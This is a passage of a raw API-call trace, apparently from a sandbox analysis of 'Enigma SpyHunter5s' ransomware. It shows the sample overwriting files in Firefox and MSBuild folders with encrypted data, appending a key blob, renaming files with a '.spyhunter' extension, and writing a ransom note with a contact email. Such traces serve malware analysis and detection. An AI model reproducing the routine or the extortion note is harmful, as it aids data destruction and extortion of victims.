lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270e72c*=0x30, lpOverlapped=0x0) returned 1 [0162.634] CloseHandle (hObject=0x178) returned 1 [0162.634] GetProcessHeap () returned 0x2c0000 [0162.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.634] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets.spyhunter") returned 104 [0162.634] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.targets"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets.spyhunter" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.targets.spyhunter")) returned 1 [0162.635] GetProcessHeap () returned 0x2c0000 [0162.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0162.635] GetProcessHeap () returned 0x2c0000 [0162.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.635] GetProcessHeap () returned 0x2c0000 [0162.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea9fd8 | out: hHeap=0x2c0000) returned 1 [0162.636] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.636] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.636] WriteFile (in: hFile=0x178, lpBuffer=0x270e6a3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e7cc, lpOverlapped=0x0 | out: lpBuffer=0x270e6a3*, lpNumberOfBytesWritten=0x270e7cc*=0x127, lpOverlapped=0x0) returned 1 [0162.637] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.637] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e7cc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e7cc*=0x2ac, lpOverlapped=0x0) returned 1 [0162.637] CloseHandle (hObject=0x178) returned 1 [0162.637] GetProcessHeap () returned 0x2c0000 [0162.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e2a0 | out: hHeap=0x2c0000) returned 1 [0162.638] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e768 | out: pbBuffer=0x270e768) returned 1 [0162.638] GetProcessHeap () returned 0x2c0000 [0162.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.638] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e760*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e760*=0x30) returned 1 [0162.638] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\updater.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.639] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini") returned 66 [0162.639] StrStrW (lpFirst="updater.ini", lpSrch=".txt") returned 0x0 [0162.639] GetProcessHeap () returned 0x2c0000 [0162.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0162.639] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e724, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e724*=0x4dd, lpOverlapped=0x0) returned 1 [0162.644] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffb23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.644] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4dd, lpNumberOfBytesWritten=0x270e724, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e724*=0x4dd, lpOverlapped=0x0) returned 1 [0162.645] GetProcessHeap () returned 0x2c0000 [0162.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0162.645] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.645] WriteFile (in: hFile=0x178, lpBuffer=0x270e764*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e724, lpOverlapped=0x0 | out: lpBuffer=0x270e764*, lpNumberOfBytesWritten=0x270e724*=0x4, lpOverlapped=0x0) returned 1 [0162.645] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e724, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270e724*=0x30, lpOverlapped=0x0) returned 1 [0162.645] CloseHandle (hObject=0x178) returned 1 [0162.645] GetProcessHeap () returned 0x2c0000 [0162.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.645] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini.spyhunter") returned 76 [0162.645] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\updater.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini.spyhunter" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\updater.ini.spyhunter")) returned 1 [0162.646] GetProcessHeap () returned 0x2c0000 [0162.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0162.646] GetProcessHeap () returned 0x2c0000 [0162.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.646] GetProcessHeap () returned 0x2c0000 [0162.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e06c18 | out: hHeap=0x2c0000) returned 1 [0162.646] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e768 | out: pbBuffer=0x270e768) returned 1 [0162.646] GetProcessHeap () returned 0x2c0000 [0162.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.646] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e760*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e760*=0x30) returned 1 [0162.646] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\maintenanceservice.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.647] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe") returned 77 [0162.647] StrStrW (lpFirst="maintenanceservice.exe", lpSrch=".txt") returned 0x0 [0162.647] GetProcessHeap () returned 0x2c0000 [0162.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0162.647] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e724, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e724*=0x2800, lpOverlapped=0x0) returned 1 [0162.664] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.664] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e724, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e724*=0x2800, lpOverlapped=0x0) returned 1 [0162.664] GetProcessHeap () returned 0x2c0000 [0162.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0162.665] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.665] WriteFile (in: hFile=0x178, lpBuffer=0x270e764*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e724, lpOverlapped=0x0 | out: lpBuffer=0x270e764*, lpNumberOfBytesWritten=0x270e724*=0x4, lpOverlapped=0x0) returned 1 [0162.670] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e724, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270e724*=0x30, lpOverlapped=0x0) returned 1 [0162.670] CloseHandle (hObject=0x178) returned 1 [0162.670] GetProcessHeap () returned 0x2c0000 [0162.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.670] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe.spyhunter") returned 87 [0162.670] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\maintenanceservice.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe.spyhunter" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\maintenanceservice.exe.spyhunter")) returned 1 [0162.671] GetProcessHeap () returned 0x2c0000 [0162.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0162.671] GetProcessHeap () returned 0x2c0000 [0162.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.671] GetProcessHeap () returned 0x2c0000 [0162.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeb690 | out: hHeap=0x2c0000) returned 1 [0162.672] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e760 | out: pbBuffer=0x270e760) returned 1 [0162.672] GetProcessHeap () returned 0x2c0000 [0162.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.672] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e758*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e758*=0x30) returned 1 [0162.672] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\updater.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.673] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini") returned 54 [0162.673] StrStrW (lpFirst="updater.ini", lpSrch=".txt") returned 0x0 [0162.673] GetProcessHeap () returned 0x2c0000 [0162.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0162.673] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e71c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e71c*=0x4dd, lpOverlapped=0x0) returned 1 [0162.677] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffb23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.677] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x4dd, lpNumberOfBytesWritten=0x270e71c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e71c*=0x4dd, lpOverlapped=0x0) returned 1 [0162.678] GetProcessHeap () returned 0x2c0000 [0162.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0162.678] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.678] WriteFile (in: hFile=0x178, lpBuffer=0x270e75c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e71c, lpOverlapped=0x0 | out: lpBuffer=0x270e75c*, lpNumberOfBytesWritten=0x270e71c*=0x4, lpOverlapped=0x0) returned 1 [0162.678] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e71c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270e71c*=0x30, lpOverlapped=0x0) returned 1 [0162.678] CloseHandle (hObject=0x178) returned 1 [0162.678] GetProcessHeap () returned 0x2c0000 [0162.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0162.678] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini.spyhunter") returned 64 [0162.678] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\updater.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\updater.ini.spyhunter")) returned 1 [0162.679] GetProcessHeap () returned 0x2c0000 [0162.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0162.679] GetProcessHeap () returned 0x2c0000 [0162.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.679] GetProcessHeap () returned 0x2c0000 [0162.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec17b8 | out: hHeap=0x2c0000) returned 1 [0162.680] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e760 | out: pbBuffer=0x270e760) returned 1 [0162.680] GetProcessHeap () returned 0x2c0000 [0162.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.680] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e758*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e758*=0x30) returned 1 [0162.680] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\updater.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\updater.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.681] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\updater.exe") returned 54 [0162.681] StrStrW (lpFirst="updater.exe", lpSrch=".txt") returned 0x0 [0162.681] GetProcessHeap () returned 0x2c0000 [0162.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0162.681] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e71c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e71c*=0x2800, lpOverlapped=0x0) returned 1 [0162.758] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.758] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e71c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e71c*=0x2800, lpOverlapped=0x0) returned 1 [0162.758] GetProcessHeap () returned 0x2c0000 [0162.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0162.758] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.758] WriteFile (in: hFile=0x178, lpBuffer=0x270e75c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e71c, lpOverlapped=0x0 | out: lpBuffer=0x270e75c*, lpNumberOfBytesWritten=0x270e71c*=0x4, lpOverlapped=0x0) returned 1 [0162.846] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e71c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270e71c*=0x30, lpOverlapped=0x0) returned 1 [0162.846] CloseHandle (hObject=0x178) returned 1 [0162.931] GetProcessHeap () returned 0x2c0000 [0162.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.931] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\updater.exe.spyhunter") returned 64 [0162.931] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\updater.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\updater.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\updater.exe.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\updater.exe.spyhunter")) returned 1 [0162.932] GetProcessHeap () returned 0x2c0000 [0162.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0162.932] GetProcessHeap () returned 0x2c0000 [0162.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.932] GetProcessHeap () returned 0x2c0000 [0162.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1700 | out: hHeap=0x2c0000) returned 1 [0162.932] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e758 | out: pbBuffer=0x270e758) returned 1 [0162.932] GetProcessHeap () returned 0x2c0000 [0162.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.932] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e750*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e750*=0x30) returned 1 [0162.932] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\platform.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0162.933] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini") returned 55 [0162.933] StrStrW (lpFirst="platform.ini", lpSrch=".txt") returned 0x0 [0162.933] GetProcessHeap () returned 0x2c0000 [0162.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0162.933] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e714, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e714*=0x8c, lpOverlapped=0x0) returned 1 [0162.934] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff74, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.934] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x8c, lpNumberOfBytesWritten=0x270e714, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e714*=0x8c, lpOverlapped=0x0) returned 1 [0162.934] GetProcessHeap () returned 0x2c0000 [0162.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0162.934] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.935] WriteFile (in: hFile=0x9c, lpBuffer=0x270e754*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e714, lpOverlapped=0x0 | out: lpBuffer=0x270e754*, lpNumberOfBytesWritten=0x270e714*=0x4, lpOverlapped=0x0) returned 1 [0162.935] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e714, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270e714*=0x30, lpOverlapped=0x0) returned 1 [0162.935] CloseHandle (hObject=0x9c) returned 1 [0162.935] GetProcessHeap () returned 0x2c0000 [0162.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.935] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini.spyhunter") returned 65 [0162.935] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\platform.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\platform.ini.spyhunter")) returned 1 [0162.935] GetProcessHeap () returned 0x2c0000 [0162.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0162.936] GetProcessHeap () returned 0x2c0000 [0162.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.936] GetProcessHeap () returned 0x2c0000 [0162.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1420 | out: hHeap=0x2c0000) returned 1 [0162.936] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e758 | out: pbBuffer=0x270e758) returned 1 [0162.936] GetProcessHeap () returned 0x2c0000 [0162.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.936] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e750*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e750*=0x30) returned 1 [0162.936] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja" (normalized: "c:\\program files (x86)\\mozilla firefox\\omni.ja"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0162.937] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja") returned 50 [0162.937] StrStrW (lpFirst="omni.ja", lpSrch=".txt") returned 0x0 [0162.937] GetProcessHeap () returned 0x2c0000 [0162.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0162.937] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e714, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e714*=0x2800, lpOverlapped=0x0) returned 1 [0163.011] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.011] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e714, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e714*=0x2800, lpOverlapped=0x0) returned 1 [0163.011] GetProcessHeap () returned 0x2c0000 [0163.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0163.011] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.011] WriteFile (in: hFile=0x9c, lpBuffer=0x270e754*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e714, lpOverlapped=0x0 | out: lpBuffer=0x270e754*, lpNumberOfBytesWritten=0x270e714*=0x4, lpOverlapped=0x0) returned 1 [0163.012] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e714, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270e714*=0x30, lpOverlapped=0x0) returned 